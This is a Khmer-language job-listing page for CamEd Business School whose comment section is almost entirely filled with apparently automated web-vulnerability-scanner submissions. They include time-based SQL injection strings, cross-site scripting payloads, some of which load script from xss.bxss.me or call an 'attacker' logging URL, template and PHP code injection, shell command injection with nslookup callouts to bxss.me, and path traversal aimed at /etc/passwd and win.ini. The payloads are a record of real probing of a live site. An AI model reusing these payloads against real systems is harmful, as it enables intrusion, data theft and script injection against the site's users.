ថ្ងៃទី 14 - 15 ខែ វិច្ឆិកា ឆ្នាំ 2020 ក្រសួងការងារ និងបណ្តុះបណ្តាលវិជ្ជាជីវៈ

ខេមអេដ ប៊ីហ្សនីសស្គូល
ខេមអេដគឺជាវិទ្យាស្ថានឈានមុខគេបង្អស់ដែលផ្តល់ការបណ្តុះបណ្តាលជំនាញ គណនេយ្យ និងហិរញ្ញវត្ថុ ដល់អ្នកជំនាញ ក្នុងធនាគារធំៗ និងក្រុមហ៊ុនប្រឹក្សាផ្នែកគណនេយ្យ ហិរញ្ញវត្ថុ និងសវនកម្ម ដូចជា PwC, KPMG, EY និង Deloitte។ ខេមអេដ មានការទទួលស្គាល់គុណភាពអប់រំកម្រិតមាសពី សមាគមគណនេយ្យករជំនាញ និងជាវិទ្យាស្ថានដំបូងគេក្នុងតំបន់ឥណ្ឌូចិនដែលទទួលបានសិទ្ធ បណ្តុះបណ្តាលកម្មវិធី ACCA។ ខេមអេដ ក៏ជាសមាជិកនៃវិទ្យាស្ថានCFA នៅ USA។

ដាក់ពាក្យស្មើសុំការងារ (CV)!

ចំនួន CV ដែលបានដាក់ពាក្យរួច 27

សូមរៀបចំ CV ជាទម្រង់ Microsoft Word, PDF ឬជារូបភាព JPG។ ទំហំមិនធំជាង 5MB។


តម្រូវការជ្រើសរើសកម្លាំងពលកម្ម សរុប 10 កន្លែង

   
សំណួរ ចម្លើយ ឬ មតិយោបល់ ទៅក្រុមហ៊ុន

 • pHqghUme

  2021-05-06 08:02:30


  @@OQjWE


 • pHqghUme

  2021-05-06 08:02:27


  1'"


 • pHqghUme

  2021-05-06 08:02:26


  1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'


 • pHqghUme

  2021-05-06 08:02:20


  1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)


 • pHqghUme

  2021-05-06 08:02:13


  4F4qkCJZ')) OR 561=(SELECT 561 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 08:02:07


  ZID8avED') OR 251=(SELECT 251 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 08:02:00


  xQLRDW8I' OR 406=(SELECT 406 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 08:01:52


  -1)) OR 685=(SELECT 685 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 08:01:44


  -5) OR 858=(SELECT 858 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 08:01:35


  -5 OR 62=(SELECT 62 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 08:01:27


  y02ZdPyc'; waitfor delay '0:0:15' --


 • pHqghUme

  2021-05-06 08:01:19


  1 waitfor delay '0:0:15' --


 • pHqghUme

  2021-05-06 08:01:10


  -1); waitfor delay '0:0:15' --


 • pHqghUme

  2021-05-06 08:01:01


  -1; waitfor delay '0:0:15' --


 • pHqghUme

  2021-05-06 08:00:52


  (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/


 • pHqghUme

  2021-05-06 08:00:44


  0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z


 • pHqghUme

  2021-05-06 08:00:33


  0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z


 • pHqghUme

  2021-05-06 08:00:20


  if(now()=sysdate(),sleep(15),0)


 • pHqghUme

  2021-05-06 08:00:09


  -1' OR 2+672-672-1=0+0+0+1 or 'TdiZYPx4'='


 • pHqghUme

  2021-05-06 08:00:09


  -1" OR 2+228-228-1=0+0+0+1 --


 • pHqghUme

  2021-05-06 08:00:08


  -1' OR 2+770-770-1=0+0+0+1 --


 • pHqghUme

  2021-05-06 08:00:07


  -1 OR 2+235-235-1=0+0+0+1 --


 • pHqghUme

  2021-05-06 08:00:07


  -1 OR 2+704-704-1=0+0+0+1


 • pHqghUme

  2021-05-06 08:00:06


  cozbRnVU


 • pHqghUme

  2021-05-06 07:59:55


  1


 • pHqghUme

  2021-05-06 07:59:39


  1


 • @@9uQMa

  2021-05-06 07:59:26


  1


 • 1'"

  2021-05-06 07:59:23


  1


 • pHqghUme'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

  2021-05-06 07:59:22


  1


 • dmDDJVMx')) OR 289=(SELECT 289 FROM PG_SLEEP(15))--

  2021-05-06 07:59:09


  1


 • XA5RvWgr') OR 502=(SELECT 502 FROM PG_SLEEP(15))--

  2021-05-06 07:58:54


  1


 • W5XaWE0R' OR 477=(SELECT 477 FROM PG_SLEEP(15))--

  2021-05-06 07:58:41


  1


 • kVid9jc8'; waitfor delay '0:0:15' --

  2021-05-06 07:58:27


  1


 • 1 waitfor delay '0:0:15' --

  2021-05-06 07:58:17


  1


 • (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

  2021-05-06 07:58:07


  1


 • 0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

  2021-05-06 07:57:58


  1


 • 0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

  2021-05-06 07:57:49


  1


 • if(now()=sysdate(),sleep(15),0)

  2021-05-06 07:57:38


  1


 • -1" OR 2+808-808-1=0+0+0+1 --

  2021-05-06 07:57:25


  1


 • -1' OR 2+235-235-1=0+0+0+1 --

  2021-05-06 07:57:24


  1


 • -1' OR 2+35-35-1=0+0+0+1 or 'ahyWO0OF'='

  2021-05-06 07:57:24


  1


 • -1 OR 2+541-541-1=0+0+0+1

  2021-05-06 07:57:23


  1


 • -1 OR 2+396-396-1=0+0+0+1 --

  2021-05-06 07:57:22


  1


 • ZRht9uCO

  2021-05-06 07:57:21


  1


 • pHqghUme

  2021-05-06 07:57:06


  1


 • pHqghUme

  2021-05-06 07:56:53


  1


 • pHqghUme

  2021-05-06 07:56:40


  1


 • pHqghUme

  2021-05-06 07:56:36


  1


 • pHqghUme

  2021-05-06 07:56:35


  1


 • pHqghUme

  2021-05-06 07:56:24


  1


 • pHqghUme

  2021-05-06 07:56:12


  1


 • pHqghUme

  2021-05-06 07:55:59


  1


 • pHqghUme

  2021-05-06 07:55:45


  1


 • pHqghUme

  2021-05-06 07:55:25


  1


 • pHqghUme

  2021-05-06 07:55:00


  1


 • pHqghUme

  2021-05-06 07:54:33


  1


 • pHqghUme

  2021-05-06 07:54:07


  1


 • pHqghUme

  2021-05-06 07:54:02


  1<SyM0Zq<


 • pHqghUme

  2021-05-06 07:53:54


  1<img sRc='http://attacker-9625/log.php?


 • pHqghUme

  2021-05-06 07:53:48


  1<YnbpZk x=9267>


 • pHqghUme

  2021-05-06 07:53:44


  1


 • pHqghUme

  2021-05-06 07:53:42


  1<ifRAme sRc=9865.com></IfRamE>


 • pHqghUme

  2021-05-06 07:53:33


  1<WUJXMW>HWDC1[!+!]</WUJXMW>


 • pHqghUme

  2021-05-06 07:53:27


  1qQwRo <ScRiPt >ROXY(9425)</ScRiPt>


 • pHqghUme

  2021-05-06 07:53:22


  1


 • pHqghUme

  2021-05-06 07:53:20


  1


 • pHqghUme

  2021-05-06 07:53:20


  1<% contenteditable onresize=ROXY(9900)>


 • pHqghUme

  2021-05-06 07:53:19


  1


 • pHqghUme

  2021-05-06 07:53:18


  1


 • pHqghUme

  2021-05-06 07:53:16


  1


 • pHqghUme

  2021-05-06 07:53:15


  1


 • pHqghUme

  2021-05-06 07:53:14


  1}body{acu:Expre/**/SSion(ROXY(9185))}


 • pHqghUme

  2021-05-06 07:53:05


  <a HrEF=jaVaScRiPT:>


 • pHqghUme

  2021-05-06 07:52:58


  <a HrEF=http://xss.bxss.me></a>


 • pHqghUme

  2021-05-06 07:52:53


  1


 • pHqghUme

  2021-05-06 07:52:51


  1<input autofocus onfocus=ROXY(9660)>


 • pHqghUme

  2021-05-06 07:52:41


  1&lt;ScRiPt&gt;ROXY(9389)&lt;/sCripT&gt;


 • pHqghUme

  2021-05-06 07:52:37


  1


 • pHqghUme

  2021-05-06 07:52:35


  1\u003CScRiPt\ROXY(9754)\u003C/sCripT\u003E


 • pHqghUme

  2021-05-06 07:52:25


  %31%3C%53%63%52%69%50%74%20%3E%52%4F%58%59%289882%29%3C%2F%73%43%72%69%70%54%3E


 • pHqghUme

  2021-05-06 07:52:23


  1


 • pHqghUme

  2021-05-06 07:52:21


  1


 • pHqghUme

  2021-05-06 07:52:20


  1


 • pHqghUme

  2021-05-06 07:52:20


  1<img/src=">" onerror=alert(9126)>


 • pHqghUme

  2021-05-06 07:52:13


  1<img src=xyz OnErRor=ROXY(9408)>


 • pHqghUme

  2021-05-06 07:52:08


  1<img src=//xss.bxss.me/t/dot.gif onload=ROXY(9943)>


 • pHqghUme

  2021-05-06 07:52:04


  1


 • pHqghUme

  2021-05-06 07:52:00


  1<body onload=ROXY(9579)>


 • pHqghUme

  2021-05-06 07:51:53


  1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9773'>


 • pHqghUme

  2021-05-06 07:51:49


  1


 • pHqghUme

  2021-05-06 07:51:48


  1<isindex type=image src=1 onerror=ROXY(9599)>


 • pHqghUme

  2021-05-06 07:51:37


  1<ScRiPt >ROXY(9429)</ScRiPt>


 • pHqghUme

  2021-05-06 07:51:33


  1


 • pHqghUme

  2021-05-06 07:51:28


  1<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9067></ScRiPt>


 • pHqghUme

  2021-05-06 07:51:22


  1<ScRiPt >ROXY(9218)</ScRiPt>


 • pHqghUme

  2021-05-06 07:51:15


  1


 • pHqghUme

  2021-05-06 07:51:15


  1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%52%4F%58%59%28%39%34%37%31%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E


 • pHqghUme

  2021-05-06 07:51:09


  1<script>ROXY(9360)</script>


 • pHqghUme

  2021-05-06 07:51:03


  1<W2WDJW>XFMOZ[!+!]</W2WDJW>


 • pHqghUme

  2021-05-06 07:51:00


  1


 • pHqghUme

  2021-05-06 07:50:58


  1<ScRiPt >ROXY(9589)</ScRiPt>


 • pHqghUme

  2021-05-06 07:50:52


  "acxzzzzzzzzbbbccccdddeeexca".replace("z","o")


 • pHqghUme

  2021-05-06 07:50:46


  acx__${98991*97996}__::.x


 • pHqghUme

  2021-05-06 07:50:43


  1


 • pHqghUme

  2021-05-06 07:50:40


  acx[[${98991*97996}]]xca


 • pHqghUme

  2021-05-06 07:50:33


  acx{{98991*97996}}xca


 • pHqghUme

  2021-05-06 07:50:28


  1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>


 • pHqghUme

  2021-05-06 07:50:24


  1


 • pHqghUme

  2021-05-06 07:50:24


  <th:t="${acx}#foreach


 • pHqghUme

  2021-05-06 07:50:17


  <%={{={@{#{${acx}}%>


 • pHqghUme

  2021-05-06 07:50:06


  acux10309%C0%BEz1%C0%BCz2a%90bcxuca10309


 • pHqghUme

  2021-05-06 07:50:06


  1


 • pHqghUme

  2021-05-06 07:49:57


  acu9457%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca9457


 • pHqghUme

  2021-05-06 07:49:50


  19460253


 • pHqghUme

  2021-05-06 07:49:48


  1


 • pHqghUme

  2021-05-06 07:49:44


  '"()&%<acx><ScRiPt >ROXY(9528)</ScRiPt>


 • pHqghUme

  2021-05-06 07:49:39


  1'"()&%<acx><ScRiPt >ROXY(9319)</ScRiPt>


 • pHqghUme<Y7PrGI<

  2021-05-06 07:49:33


  1


 • pHqghUme

  2021-05-06 07:49:31


  1


 • pHqghUme

  2021-05-06 07:49:30


  1


 • pHqghUme

  2021-05-06 07:49:29


  1


 • pHqghUme

  2021-05-06 07:49:28


  1


 • pHqghUme

  2021-05-06 07:49:27


  1


 • pHqghUme

  2021-05-06 07:49:27


  1


 • pHqghUme<img sRc='http://attacker-9398/log.php?

  2021-05-06 07:49:25


  1


 • pHqghUme<8eocgg x=9930>

  2021-05-06 07:49:18


  1


 • pHqghUme<ifRAme sRc=9435.com></IfRamE>

  2021-05-06 07:49:10


  1


 • pHqghUme<WFBCKG>A6KXG[!+!]</WFBCKG>

  2021-05-06 07:49:06


  1


 • pHqghUmek1SnW <ScRiPt >ROXY(9221)</ScRiPt>

  2021-05-06 07:49:01


  1


 • pHqghUme<% contenteditable onresize=ROXY(9680)>

  2021-05-06 07:48:55


  1


 • pHqghUme

  2021-05-06 07:48:54


  1


 • pHqghUme}body{acu:Expre/**/SSion(ROXY(9960))}

  2021-05-06 07:48:50


  1


 • <a HrEF=jaVaScRiPT:>

  2021-05-06 07:48:44


  1


 • <a HrEF=http://xss.bxss.me></a>

  2021-05-06 07:48:38


  1


 • pHqghUme<input autofocus onfocus=ROXY(9770)>

  2021-05-06 07:48:32


  1


 • pHqghUme

  2021-05-06 07:48:30


  1


 • pHqghUme&lt;ScRiPt&gt;ROXY(9741)&lt;/sCripT&gt;

  2021-05-06 07:48:25


  1


 • pHqghUme\u003CScRiPt\ROXY(9335)\u003C/sCripT\u003E

  2021-05-06 07:48:20


  1


 • %70%48%71%67%68%55%6D%65%3C%53%63%52%69%50%74%20%3E%52%4F%58%59%289524%29%3C%2F%73%43%72%69%70%54%3E

  2021-05-06 07:48:15


  1


 • pHqghUme<img/src=">" onerror=alert(9320)>

  2021-05-06 07:48:09


  1


 • pHqghUme<img src=xyz OnErRor=ROXY(9385)>

  2021-05-06 07:48:04


  1


 • pHqghUme<img src=//xss.bxss.me/t/dot.gif onload=ROXY(9622)>

  2021-05-06 07:47:56


  1


 • pHqghUme<body onload=ROXY(9355)>

  2021-05-06 07:47:51


  1


 • pHqghUme<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9488'>

  2021-05-06 07:47:44


  1


 • pHqghUme<isindex type=image src=1 onerror=ROXY(9283)>

  2021-05-06 07:47:35


  1


 • pHqghUme<ScRiPt >ROXY(9287)</ScRiPt>

  2021-05-06 07:47:18


  1


 • pHqghUme<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9321></ScRiPt>

  2021-05-06 07:47:08


  1


 • pHqghUme<ScRiPt >ROXY(9896)</ScRiPt>

  2021-05-06 07:46:56


  1


 • pHqghUme%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%52%4F%58%59%28%39%33%38%30%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E

  2021-05-06 07:46:41


  1


 • pHqghUme<script>ROXY(9819)</script>

  2021-05-06 07:46:31


  1


 • pHqghUme<W0CTCW>VTBTA[!+!]</W0CTCW>

  2021-05-06 07:46:24


  1


 • pHqghUme<ScRiPt >ROXY(9683)</ScRiPt>

  2021-05-06 07:46:18


  1


 • "acxzzzzzzzzbbbccccdddeeexca".replace("z","o")

  2021-05-06 07:46:11


  1


 • acx__${98991*97996}__::.x

  2021-05-06 07:46:05


  1


 • acx[[${98991*97996}]]xca

  2021-05-06 07:45:49


  1


 • acx{{98991*97996}}xca

  2021-05-06 07:45:42


  1


 • 1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>

  2021-05-06 07:45:36


  1


 • <th:t="${acx}#foreach

  2021-05-06 07:45:30


  1


 • <%={{={@{#{${acx}}%>

  2021-05-06 07:45:23


  1


 • acux4697%C0%BEz1%C0%BCz2a%90bcxuca4697

  2021-05-06 07:45:17


  1


 • acu5885%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca5885

  2021-05-06 07:45:11


  1


 • pHqghUme9456003

  2021-05-06 07:45:03


  1


 • '"()&%<acx><ScRiPt >ROXY(9300)</ScRiPt>

  2021-05-06 07:44:58


  1


 • pHqghUme'"()&%<acx><ScRiPt >ROXY(9889)</ScRiPt>

  2021-05-06 07:44:50


  1


 • pHqghUme

  2021-05-06 07:44:43


  1


 • pHqghUme

  2021-05-06 07:44:36


  1


 • pHqghUme

  2021-05-06 07:44:29


  1


 • pHqghUme

  2021-05-06 07:44:21


  1


 • pHqghUme

  2021-05-06 07:44:19


  '.print(md5(31337)).'


 • pHqghUme

  2021-05-06 07:44:18


  ${@print(md5(31337))}\


 • pHqghUme

  2021-05-06 07:44:16


  ${@print(md5(31337))}


 • pHqghUme

  2021-05-06 07:44:15


  ";print(md5(31337));$a="


 • pHqghUme

  2021-05-06 07:44:14


  ';print(md5(31337));$a='


 • pHqghUme

  2021-05-06 07:44:13


  ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));


 • pHqghUme

  2021-05-06 07:44:12


  1


 • '.print(md5(31337)).'

  2021-05-06 07:44:11


  1


 • ${@print(md5(31337))}\

  2021-05-06 07:44:10


  1


 • ";print(md5(31337));$a="

  2021-05-06 07:44:08


  1


 • ${@print(md5(31337))}

  2021-05-06 07:44:08


  1


 • ';print(md5(31337));$a='

  2021-05-06 07:44:06


  1


 • pHqghUme

  2021-05-06 07:44:05


  1


 • ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

  2021-05-06 07:44:05


  1


 • pHqghUme

  2021-05-06 07:44:04


  1


 • pHqghUme

  2021-05-06 07:44:03


  <!--


 • pHqghUme

  2021-05-06 07:44:02


  '"


 • pHqghUme

  2021-05-06 07:44:02


  1


 • pHqghUme

  2021-05-06 07:44:01


  1


 • <!--

  2021-05-06 07:44:01


  1


 • pHqghUme

  2021-05-06 07:44:01


  1


 • '"

  2021-05-06 07:44:00


  1


 • pHqghUme

  2021-05-06 07:43:59


  `(nslookup hitqnjyehzdaje16fc.bxss.me||perl -e "gethostbyname('hitqnjyehzdaje16fc.bxss.me')")`


 • pHqghUme

  2021-05-06 07:43:59


  1


 • pHqghUme

  2021-05-06 07:43:58


  |(nslookup hitpqeqcvwvapcb446.bxss.me||perl -e "gethostbyname('hitpqeqcvwvapcb446.bxss.me')")


 • pHqghUme

  2021-05-06 07:43:58


  1


 • pHqghUme

  2021-05-06 07:43:58


  1


 • pHqghUme

  2021-05-06 07:43:57


  1


 • pHqghUme

  2021-05-06 07:43:57


  1


 • pHqghUme

  2021-05-06 07:43:56


  "+"A".concat(70-3).concat(22*4).concat(120).concat(79).concat(110).concat(76)+(require"socket" Socket.gethostbyname("hitvh"+"acsgwpya3b385.bxss.me.")[3].to_s)+"


 • pHqghUme

  2021-05-06 07:43:56


  1


 • pHqghUme

  2021-05-06 07:43:56


  '+'A'.concat(70-3).concat(22*4).concat(116).concat(65).concat(106).concat(84)+(require'socket' Socket.gethostbyname('hitrb'+'jxxuozmcdd02d.bxss.me.')[3].to_s)+'


 • pHqghUme

  2021-05-06 07:43:55


  1


 • pHqghUme

  2021-05-06 07:43:55


  1


 • pHqghUme

  2021-05-06 07:43:54


  1


 • "+"A".concat(70-3).concat(22*4).concat(117).concat(79).concat(104).concat(90)+(require"socket" Socket.gethostbyname("hitdi"+"ixorxpcy4453c.bxss.me.")[3].to_s)+"

  2021-05-06 07:43:54


  1


 • pHqghUme

  2021-05-06 07:43:54


  1


 • pHqghUme

  2021-05-06 07:43:54


  /xfs.bxss.me


 • '+'A'.concat(70-3).concat(22*4).concat(100).concat(81).concat(97).concat(75)+(require'socket' Socket.gethostbyname('hitgk'+'kjxitzpk8bbe6.bxss.me.')[3].to_s)+'

  2021-05-06 07:43:54


  1


 • pHqghUme

  2021-05-06 07:43:53


  1


 • /xfs.bxss.me

  2021-05-06 07:43:53


  1


 • pHqghUme

  2021-05-06 07:43:53


  1


 • pHqghUme

  2021-05-06 07:43:53


  $(nslookup hitnrntplgrks85e28.bxss.me||perl -e "gethostbyname('hitnrntplgrks85e28.bxss.me')")


 • pHqghUme

  2021-05-06 07:43:52


  1


 • pHqghUme

  2021-05-06 07:43:52


  1


 • pHqghUme

  2021-05-06 07:43:52


  1


 • pHqghUme

  2021-05-06 07:43:52


  (nslookup hitdtrjyqsidu6b964.bxss.me||perl -e "gethostbyname('hitdtrjyqsidu6b964.bxss.me')")


 • pHqghUme

  2021-05-06 07:43:52


  )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))


 • pHqghUme

  2021-05-06 07:43:51


  bxss.me/t/xss.html?%00


 • pHqghUme

  2021-05-06 07:43:51


  1


 • pHqghUme

  2021-05-06 07:43:51


  1


 • pHqghUme

  2021-05-06 07:43:51


  |echo nbozrm$()\ ztmdfb\nz^xyu||a #' |echo nbozrm$()\ ztmdfb\nz^xyu||a #|" |echo nbozrm$()\ ztmdfb\nz^xyu||a #


 • )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

  2021-05-06 07:43:51


  1


 • pHqghUme

  2021-05-06 07:43:50


  1


 • pHqghUme

  2021-05-06 07:43:49


  HttP://bxss.me/t/xss.html?%00


 • pHqghUme

  2021-05-06 07:43:49


  &echo fzhmrm$()\ cjrjlf\nz^xyu||a #' &echo fzhmrm$()\ cjrjlf\nz^xyu||a #|" &echo fzhmrm$()\ cjrjlf\nz^xyu||a #


 • pHqghUme

  2021-05-06 07:43:49


  1


 • pHqghUme

  2021-05-06 07:43:48


  ".gethostbyname(lc("hitla"."ksujwnrndad4c.bxss.me."))."A".chr(67).chr(hex("58")).chr(108).chr(76).chr(116).chr(87)."


 • bxss.me/t/xss.html?%00

  2021-05-06 07:43:48


  1


 • pHqghUme

  2021-05-06 07:43:48


  echo uhcyog$()\ eqavty\nz^xyu||a #' &echo uhcyog$()\ eqavty\nz^xyu||a #|" &echo uhcyog$()\ eqavty\nz^xyu||a #


 • pHqghUme

  2021-05-06 07:43:48


  1


 • HttP://bxss.me/t/xss.html?%00

  2021-05-06 07:43:46


  1


 • pHqghUme

  2021-05-06 07:43:46


  '.gethostbyname(lc('hitkp'.'ohqggcfn0e44c.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(122).chr(81).chr(119).chr(68).'


 • pHqghUme

  2021-05-06 07:43:45


  1


 • ".gethostbyname(lc("hitdu"."simxygrhad3d4.bxss.me."))."A".chr(67).chr(hex("58")).chr(120).chr(71).chr(112).chr(65)."

  2021-05-06 07:43:45


  1


 • pHqghUme

  2021-05-06 07:43:45


  1


 • pHqghUme

  2021-05-06 07:43:44


  1


 • '.gethostbyname(lc('hitka'.'fzzbdryi4a60d.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(102).chr(81).chr(105).chr(77).'

  2021-05-06 07:43:44


  1


 • pHqghUme

  2021-05-06 07:43:43


  1


 • pHqghUme

  2021-05-06 07:43:43


  1


 • pHqghUme

  2021-05-06 07:43:42


  1


 • pHqghUme

  2021-05-06 07:43:41


  1&n962093=v965489


 • |(nslookup hitbkkigvstaj664f0.bxss.me||perl -e "gethostbyname('hitbkkigvstaj664f0.bxss.me')")

  2021-05-06 07:43:41


  1


 • pHqghUme

  2021-05-06 07:43:41


  bxss.me


 • pHqghUme

  2021-05-06 07:43:41


  1


 • `(nslookup hitlbzbfgpbqubc153.bxss.me||perl -e "gethostbyname('hitlbzbfgpbqubc153.bxss.me')")`

  2021-05-06 07:43:41


  1


 • pHqghUme

  2021-05-06 07:43:40


  1


 • pHqghUme

  2021-05-06 07:43:39


  Http://bxss.me/t/fit.txt


 • pHqghUme

  2021-05-06 07:43:39


  http://bxss.me/t/fit.txt%3F.jpg


 • pHqghUme

  2021-05-06 07:43:38


  '"()


 • pHqghUme

  2021-05-06 07:43:38


  1some_inexistent_file_with_long_name%00.jpg


 • pHqghUme

  2021-05-06 07:43:37


  http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg


 • bxss.me

  2021-05-06 07:43:36


  1


 • http://bxss.me/t/fit.txt%3F.jpg

  2021-05-06 07:43:35


  1


 • pHqghUme

  2021-05-06 07:43:35


  ^(#$!@#$)(()))******


 • pHqghUme

  2021-05-06 07:43:34


  !(()&&!|*|*|


 • pHqghUme

  2021-05-06 07:43:34


  12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡


 • $(nslookup hitxuhsukhkvccc0e1.bxss.me||perl -e "gethostbyname('hitxuhsukhkvccc0e1.bxss.me')")

  2021-05-06 07:43:34


  1


 • (nslookup hiteumqxkkrqdc7331.bxss.me||perl -e "gethostbyname('hiteumqxkkrqdc7331.bxss.me')")

  2021-05-06 07:43:33


  1


 • '"()

  2021-05-06 07:43:33


  1


 • Http://bxss.me/t/fit.txt

  2021-05-06 07:43:33


  1


 • 1some_inexistent_file_with_long_name%00.jpg

  2021-05-06 07:43:32


  1


 • pHqghUme

  2021-05-06 07:43:32


  )


 • &echo ymqklu$()\ arxebt\nz^xyu||a #' &echo ymqklu$()\ arxebt\nz^xyu||a #|" &echo ymqklu$()\ arxebt\nz^xyu||a #

  2021-05-06 07:43:31


  1


 • pHqghUme&n986713=v928684

  2021-05-06 07:43:31


  1


 • ^(#$!@#$)(()))******

  2021-05-06 07:43:31


  1


 • http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg

  2021-05-06 07:43:31


  1


 • |echo swpvni$()\ hahxzb\nz^xyu||a #' |echo swpvni$()\ hahxzb\nz^xyu||a #|" |echo swpvni$()\ hahxzb\nz^xyu||a #

  2021-05-06 07:43:31


  1


 • !(()&&!|*|*|

  2021-05-06 07:43:30


  1


 • pHqghUme

  2021-05-06 07:43:30


  1


 • pHqghUme

  2021-05-06 07:43:29


  1


 • )

  2021-05-06 07:43:29


  1


 • echo kdxnss$()\ jabigs\nz^xyu||a #' &echo kdxnss$()\ jabigs\nz^xyu||a #|" &echo kdxnss$()\ jabigs\nz^xyu||a #

  2021-05-06 07:43:29


  1


 • pHqghUme

  2021-05-06 07:43:28


  1


 • pHqghUme

  2021-05-06 07:43:27


  1


 • pHqghUme

  2021-05-06 07:43:27


  1


 • pHqghUme

  2021-05-06 07:43:26


  1


 • pHqghUme

  2021-05-06 07:43:26


  1


 • pHqghUme

  2021-05-06 07:43:26


  1


 • pHqghUme

  2021-05-06 07:43:26


  1


 • pHqghUme

  2021-05-06 07:43:25


  1


 • pHqghUme

  2021-05-06 07:43:25


  1


 • pHqghUme

  2021-05-06 07:43:24


  1


 • pHqghUme

  2021-05-06 07:43:24


  1


 • pHqghUme

  2021-05-06 07:43:24


  1


 • pHqghUme

  2021-05-06 07:43:24


  1


 • pHqghUme

  2021-05-06 07:43:23


  1


 • pHqghUme

  2021-05-06 07:43:23


  1


 • pHqghUme

  2021-05-06 07:43:23


  1


 • pHqghUme

  2021-05-06 07:43:22


  1


 • 12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡

  2021-05-06 07:43:21


  1


 • pHqghUme

  2021-05-06 07:43:21


  1


 • pHqghUme

  2021-05-06 07:43:20


  1


 • pHqghUme

  2021-05-06 07:43:19


  1


 • QWNrRWg5cDk=

  2021-05-06 07:43:17


  1


 • pHqghUme

  2021-05-06 07:43:17


  1


 • pHqghUme

  2021-05-06 07:43:16


  1


 • pHqghUme

  2021-05-06 07:43:16


  ../1


 • pHqghUme

  2021-05-06 07:43:15


  ../../../../../../../../../../../../../../windows/win.ini


 • pHqghUme

  2021-05-06 07:43:15


  1


 • pHqghUme

  2021-05-06 07:43:15


  1


 • pHqghUme

  2021-05-06 07:43:15


  1


 • pHqghUme

  2021-05-06 07:43:14


  ../../../../../../../../../../../../../../etc/passwd


 • pHqghUme

  2021-05-06 07:43:14


  ${9999777+10000316}


 • pHqghUme

  2021-05-06 07:43:14


  1


 • ../pHqghUme

  2021-05-06 07:43:13


  1


 • ${9999351+10000107}

  2021-05-06 07:43:13


  1


 • pHqghUme

  2021-05-06 07:43:13


  1


 • pHqghUme

  2021-05-06 07:43:12


  1


 • pHqghUme

  2021-05-06 07:43:12


  1


 • ../../../../../../../../../../../../../../windows/win.ini

  2021-05-06 07:43:10


  1


 • pHqghUme

  2021-05-06 07:43:10


  1


 • pHqghUme

  2021-05-06 07:43:10


  1<esi:include src="http://bxss.me/rpb.png"/>


 • pHqghUme

  2021-05-06 07:43:10


  1


 • pHqghUme

  2021-05-06 07:43:09


  1


 • ../../../../../../../../../../../../../../etc/passwd

  2021-05-06 07:43:08


  1


 • pHqghUme

  2021-05-06 07:43:07


  1


 • pHqghUme<esi:include src="http://bxss.me/rpb.png"/>

  2021-05-06 07:43:07


  1


 • pHqghUme

  2021-05-06 07:43:06


  1


 • pHqghUme

  2021-05-06 07:43:06


  1


 • pHqghUme

  2021-05-06 07:43:05


  1


 • pHqghUme

  2021-05-06 07:43:05


  1


 • pHqghUme

  2021-05-06 07:43:05


  1


 • pHqghUme

  2021-05-06 07:43:05


  1


 • pHqghUme

  2021-05-06 07:43:04


  1


 • pHqghUme

  2021-05-06 07:43:04


  1


 • pHqghUme

  2021-05-06 07:43:04


  1


 • pHqghUme

  2021-05-06 07:43:04


  1


 • pHqghUme

  2021-05-06 07:43:03


  1


 • pHqghUme

  2021-05-06 07:43:03


  1


 • pHqghUme

  2021-05-06 07:43:03


  1


 • pHqghUme

  2021-05-06 07:43:03


  1


 • pHqghUme

  2021-05-06 07:43:02


  1


 • pHqghUme

  2021-05-06 07:43:02


  1


 • pHqghUme

  2021-05-06 07:43:00


  1


 • pHqghUme

  2021-05-06 07:42:56


  1


 • pHqghUme

  2021-05-06 07:42:56


  vcesvWXP


 • R4waWZGJ

  2021-05-06 07:42:55


  1


 • pHqghUme

  2021-05-06 07:42:55


  1


 • pHqghUme

  2021-05-06 07:42:53


  1


 • pHqghUme

  2021-05-06 07:42:53


  1


 • pHqghUme

  2021-05-06 07:42:51


  "+response.write(9792407*9591206)+"


 • pHqghUme

  2021-05-06 07:42:50


  response.write(9792407*9591206)


